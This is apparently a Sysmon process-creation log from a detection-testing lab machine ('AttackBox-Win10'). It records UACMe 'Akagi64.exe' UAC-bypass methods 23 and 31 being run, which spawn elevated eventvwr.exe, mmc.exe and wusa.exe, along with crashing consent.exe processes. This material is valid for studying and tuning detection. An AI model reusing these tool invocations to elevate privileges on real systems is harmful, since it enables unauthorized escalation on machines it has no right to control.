AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C79D-6552-1F03-000000001E00}8048C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe"NT AUTHORITY\SYSTEM 154100x8000000000000000675733Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:29.138{51A89197-C79D-6552-1F03-000000001E00}8048C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C79D-6552-1E03-000000001E00}1880C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3452 -ip 3452NT AUTHORITY\SYSTEM 154100x8000000000000000675707Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:29.118{51A89197-C79D-6552-1E03-000000001E00}1880C:\Windows\SysWOW64\WerFault.exe10.0.17134.648 (WinBuild.160101.0800)Windows Problem ReportingMicrosoft® Windows® Operating SystemMicrosoft CorporationWerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3452 -ip 3452C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e70SystemSHA1=185D44A7B9D0D38BFD891F2E397172B973D87249,MD5=5692CB2476B44EF30B756FC10602A641,SHA256=BD67230BB3BBAE5B79A9144BCF31D1F1E7F4E05299F54F9630785E89B3B51AB3,IMPHASH=349ED5D22EC6FCF1B2FBA053B24A869C{51A89197-C795-6552-0203-000000001E00}6904C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroupNT AUTHORITY\SYSTEM 154100x8000000000000000675677Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:29.094{51A89197-C79D-6552-1D03-000000001E00}3452C:\Windows\SysWOW64\WerFault.exe10.0.17134.648 (WinBuild.160101.0800)Windows Problem ReportingMicrosoft® Windows® Operating SystemMicrosoft CorporationWerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2276 -s 80C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=185D44A7B9D0D38BFD891F2E397172B973D87249,MD5=5692CB2476B44EF30B756FC10602A641,SHA256=BD67230BB3BBAE5B79A9144BCF31D1F1E7F4E05299F54F9630785E89B3B51AB3,IMPHASH=349ED5D22EC6FCF1B2FBA053B24A869C{51A89197-C79D-6552-1903-000000001E00}2276C:\Windows\SysWOW64\wusa.exe"C:\Windows\syswow64\wusa.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000675676Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:29.093{51A89197-C79D-6552-1C03-000000001E00}4004C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsNT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C79D-6552-1B03-000000001E00}2340C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe"NT AUTHORITY\SYSTEM 154100x8000000000000000675665Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:29.079{51A89197-C79D-6552-1B03-000000001E00}2340C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C79D-6552-1A03-000000001E00}4572C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2276 -ip 2276NT AUTHORITY\SYSTEM 154100x8000000000000000675625Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:29.046{51A89197-C79D-6552-1A03-000000001E00}4572C:\Windows\SysWOW64\WerFault.exe10.0.17134.648 (WinBuild.160101.0800)Windows Problem ReportingMicrosoft® Windows® Operating SystemMicrosoft CorporationWerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2276 -ip 2276C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e70SystemSHA1=185D44A7B9D0D38BFD891F2E397172B973D87249,MD5=5692CB2476B44EF30B756FC10602A641,SHA256=BD67230BB3BBAE5B79A9144BCF31D1F1E7F4E05299F54F9630785E89B3B51AB3,IMPHASH=349ED5D22EC6FCF1B2FBA053B24A869C{51A89197-C795-6552-0203-000000001E00}6904C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroupNT AUTHORITY\SYSTEM 154100x8000000000000000675612Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:29.007{51A89197-C79D-6552-1903-000000001E00}2276C:\Windows\SysWOW64\wusa.exe10.0.17134.1 (WinBuild.160101.0800)Windows Update Standalone InstallerMicrosoft® Windows® Operating SystemMicrosoft Corporationwusa.exe"C:\Windows\syswow64\wusa.exe" C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=93FDFA65EFF0A13C6754BC23391DA5B1E4EE9127,MD5=FDC578FDAB4159F71DAC51C020035BB1,SHA256=688D914FAB2AA4719AB34B46BF0A16AC596C900416C904043BEBABF0CA5A85AB,IMPHASH=C38827184EFAE4276CD3A183021B2556{51A89197-C79B-6552-1403-000000001E00}7988C:\DetectionTesting\Temp\ExternalPayloads\uacme\31 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\31 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000675565Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:28.916{51A89197-C79C-6552-1803-000000001E00}6836C:\Windows\System32\dllhost.exe10.0.17134.1 (WinBuild.160101.0800)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=257815EF5AC9E0408D327C5D1627D4C3795FF341,MD5=2528137C6745C4EADD87817A1909677E,SHA256=204FD3DA29E9197A7E82AB628E017A74082934E87092AFE18D253446608E0971,IMPHASH=68E651F131674892AE7E46556EB24726{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000675322Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:28.747{51A89197-C79C-6552-1703-000000001E00}6628C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 294 0000025DF3FBCAC0C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000675288Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:28.660{51A89197-C79C-6552-1603-000000001E00}7616C:\Windows\SysWOW64\wusa.exe10.0.17134.1 (WinBuild.160101.0800)Windows Update Standalone InstallerMicrosoft® Windows® Operating SystemMicrosoft Corporationwusa.exe"C:\Windows\syswow64\wusa.exe" C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=93FDFA65EFF0A13C6754BC23391DA5B1E4EE9127,MD5=FDC578FDAB4159F71DAC51C020035BB1,SHA256=688D914FAB2AA4719AB34B46BF0A16AC596C900416C904043BEBABF0CA5A85AB,IMPHASH=C38827184EFAE4276CD3A183021B2556{51A89197-C79B-6552-1403-000000001E00}7988C:\DetectionTesting\Temp\ExternalPayloads\uacme\31 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\31 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000674951Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:28.162{51A89197-C79C-6552-1503-000000001E00}4972C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 272 0000025DF3F08190C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000674883Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:27.697{51A89197-C79B-6552-1403-000000001E00}7988C:\DetectionTesting\Temp\ExternalPayloads\uacme\31 Akagi64.exe3.2.7.2009UACMe main moduleUACMeHazardous EnvironmentsAkagi.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\31 Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=88BBA541ADD1A43C0FAE09B0071FCA25F8E07BE3,MD5=94FD75821CC30658CF96B9BD34D89CC8,SHA256=0AE07CA8EC7BE8AD09E9C4A914D61852EA6797B52445D611404598F13AE6DD0B,IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38{51A89197-C79B-6552-1203-000000001E00}8160C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\31 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000674851Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:27.633{51A89197-C79B-6552-1303-000000001E00}6616C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C79B-6552-1203-000000001E00}8160C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\31 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000674844Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:27.608{51A89197-C79B-6552-1203-000000001E00}8160C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\31 Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000674588Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:26.968{51A89197-C79A-6552-1103-000000001E00}6344C:\Windows\System32\dllhost.exe10.0.17134.1 (WinBuild.160101.0800)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\system32\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=257815EF5AC9E0408D327C5D1627D4C3795FF341,MD5=2528137C6745C4EADD87817A1909677E,SHA256=204FD3DA29E9197A7E82AB628E017A74082934E87092AFE18D253446608E0971,IMPHASH=68E651F131674892AE7E46556EB24726{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000674274Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:26.407{51A89197-C79A-6552-1003-000000001E00}7072C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsNT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C79A-6552-0F03-000000001E00}6440C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe"NT AUTHORITY\SYSTEM 154100x8000000000000000674267Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:26.379{51A89197-C79A-6552-0F03-000000001E00}6440C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C797-6552-0B03-000000001E00}1252C:\Windows\System32\consent.execonsent.exe 368 272 0000025DF3F076E0NT AUTHORITY\SYSTEM 154100x8000000000000000673591Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:24.355{51A89197-C798-6552-0E03-000000001E00}5492C:\Windows\System32\WerFault.exe10.0.17134.648 (WinBuild.160101.0800)Windows Problem ReportingMicrosoft® Windows® Operating SystemMicrosoft CorporationWerFault.exeC:\Windows\system32\WerFault.exe -u -p 1252 -s 120C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=68D4AB98712730105C5B0C10C7E1AC16476266A8,MD5=2BB64857327596580A13A716F6E93A94,SHA256=AB938E4BB520F23DD2E81982589512CBD9DCE6567AD43109C3AB6E3B116133E2,IMPHASH=86C4F1031DF799C3EF20ACD0A8B2A818{51A89197-C797-6552-0B03-000000001E00}1252C:\Windows\System32\consent.execonsent.exe 368 272 0000025DF3F076E0NT AUTHORITY\SYSTEM 154100x8000000000000000673455Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:24.156{51A89197-C798-6552-0C03-000000001E00}348C:\Windows\System32\WerFault.exe10.0.17134.648 (WinBuild.160101.0800)Windows Problem ReportingMicrosoft® Windows® Operating SystemMicrosoft CorporationWerFault.exeC:\Windows\system32\WerFault.exe -pss -s 420 -p 1252 -ip 1252C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e70SystemSHA1=68D4AB98712730105C5B0C10C7E1AC16476266A8,MD5=2BB64857327596580A13A716F6E93A94,SHA256=AB938E4BB520F23DD2E81982589512CBD9DCE6567AD43109C3AB6E3B116133E2,IMPHASH=86C4F1031DF799C3EF20ACD0A8B2A818{51A89197-C795-6552-0203-000000001E00}6904C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroupNT AUTHORITY\SYSTEM 154100x8000000000000000673162Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:23.926{51A89197-C797-6552-0B03-000000001E00}1252C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 272 0000025DF3F076E0C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000672975Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:23.674{51A89197-C797-6552-0A03-000000001E00}3628C:\Windows\System32\mmc.exe10.0.17134.1 (WinBuild.160101.0800)Microsoft Management ConsoleMicrosoft® Windows® Operating SystemMicrosoft Corporationmmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc"C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=382008FBA9480F6568DB3E1F335D080192DE62CA,MD5=BA80301974CC8C4FB9F3F9DDB5905C30,SHA256=683C0CB518B3FE31CFFA7FCF79F5EFC18D355C6D52734757758ED26AE5950037,IMPHASH=A4839A4F4C2BB2C12AA47ACB52D27833{51A89197-C797-6552-0903-000000001E00}5824C:\Windows\System32\eventvwr.exe"C:\Windows\system32\eventvwr.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000672942Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:23.626{51A89197-C797-6552-0903-000000001E00}5824C:\Windows\System32\eventvwr.exe10.0.17134.1 (WinBuild.160101.0800)Event Viewer Snapin LauncherMicrosoft® Windows® Operating SystemMicrosoft Corporationeventvwr.exe"C:\Windows\system32\eventvwr.exe" C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=28BB161C17A1F502EFADE3F88273C8D489C8FD23,MD5=D9F31E9C7E898BC057FFEBD6D5A25979,SHA256=0EE8F607E5CCD6D0AB3296BBB37254C096CAC9EC464FD8AA75F0838C8F40276B,IMPHASH=5843AE9886BB500E05E07EE59BB5AD42{51A89197-C792-6552-F902-000000001E00}1932C:\DetectionTesting\Temp\ExternalPayloads\uacme\23 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\23 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000672839Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:23.410{51A89197-C797-6552-0803-000000001E00}5560C:\Windows\System32\dllhost.exe10.0.17134.1 (WinBuild.160101.0800)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=257815EF5AC9E0408D327C5D1627D4C3795FF341,MD5=2528137C6745C4EADD87817A1909677E,SHA256=204FD3DA29E9197A7E82AB628E017A74082934E87092AFE18D253446608E0971,IMPHASH=68E651F131674892AE7E46556EB24726{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000672659Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:23.296{51A89197-C797-6552-0703-000000001E00}6164C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsNT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C797-6552-0603-000000001E00}7440C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe"NT AUTHORITY\SYSTEM 154100x8000000000000000672595Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:23.251{51A89197-C797-6552-0603-000000001E00}7440C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C795-6552-0103-000000001E00}1184C:\Windows\System32\consent.execonsent.exe 368 318 0000025DF1F4DD20NT AUTHORITY\SYSTEM 154100x8000000000000000671909Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:22.043{51A89197-C796-6552-0503-000000001E00}6276C:\Windows\System32\WerFault.exe10.0.17134.648 (WinBuild.160101.0800)Windows Problem ReportingMicrosoft® Windows® Operating SystemMicrosoft CorporationWerFault.exeC:\Windows\system32\WerFault.exe -u -p 1184 -s 128C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=68D4AB98712730105C5B0C10C7E1AC16476266A8,MD5=2BB64857327596580A13A716F6E93A94,SHA256=AB938E4BB520F23DD2E81982589512CBD9DCE6567AD43109C3AB6E3B116133E2,IMPHASH=86C4F1031DF799C3EF20ACD0A8B2A818{51A89197-C795-6552-0103-000000001E00}1184C:\Windows\System32\consent.execonsent.exe 368 318 0000025DF1F4DD20NT AUTHORITY\SYSTEM 154100x8000000000000000671823Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:21.916{51A89197-C795-6552-0303-000000001E00}5736C:\Windows\System32\WerFault.exe10.0.17134.648 (WinBuild.160101.0800)Windows Problem ReportingMicrosoft® Windows® Operating SystemMicrosoft CorporationWerFault.exeC:\Windows\system32\WerFault.exe -pss -s 468 -p 1184 -ip 1184C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e70SystemSHA1=68D4AB98712730105C5B0C10C7E1AC16476266A8,MD5=2BB64857327596580A13A716F6E93A94,SHA256=AB938E4BB520F23DD2E81982589512CBD9DCE6567AD43109C3AB6E3B116133E2,IMPHASH=86C4F1031DF799C3EF20ACD0A8B2A818{51A89197-C795-6552-0203-000000001E00}6904C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroupNT AUTHORITY\SYSTEM 154100x8000000000000000671737Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:21.823{51A89197-C795-6552-0203-000000001E00}6904C:\Windows\System32\svchost.exe10.0.17134.556 (WinBuild.160101.0800)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroupC:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e70SystemSHA1=C02EC813B2E6CBA92E1C72376850737DF204D4C5,MD5=0861726716C9610CE5F6BCF3F4858DA1,SHA256=29F04D5F4B8D798038CB9647178A8B9C68E16DC50DA850937F6E993FC7967B75,IMPHASH=E83C43A0A0660977831CA16F5521B0E0{51A89197-BE59-6552-0B00-000000001E00}596C:\Windows\System32\services.exeC:\Windows\system32\services.exeNT AUTHORITY\SYSTEM 154100x8000000000000000671677Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:21.786{51A89197-C795-6552-0103-000000001E00}1184C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 318 0000025DF1F4DD20C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000671667Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:21.771{51A89197-C795-6552-0003-000000001E00}6400C:\Windows\System32\eventvwr.exe10.0.17134.1 (WinBuild.160101.0800)Event Viewer Snapin LauncherMicrosoft® Windows® Operating SystemMicrosoft Corporationeventvwr.exe"C:\Windows\system32\eventvwr.exe" C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=28BB161C17A1F502EFADE3F88273C8D489C8FD23,MD5=D9F31E9C7E898BC057FFEBD6D5A25979,SHA256=0EE8F607E5CCD6D0AB3296BBB37254C096CAC9EC464FD8AA75F0838C8F40276B,IMPHASH=5843AE9886BB500E05E07EE59BB5AD42{51A89197-C792-6552-F902-000000001E00}1932C:\DetectionTesting\Temp\ExternalPayloads\uacme\23 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\23 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000671338Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:21.190{51A89197-C795-6552-FF02-000000001E00}4404C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 272 0000025DF3F06FC0C:\Windows\system32\NT 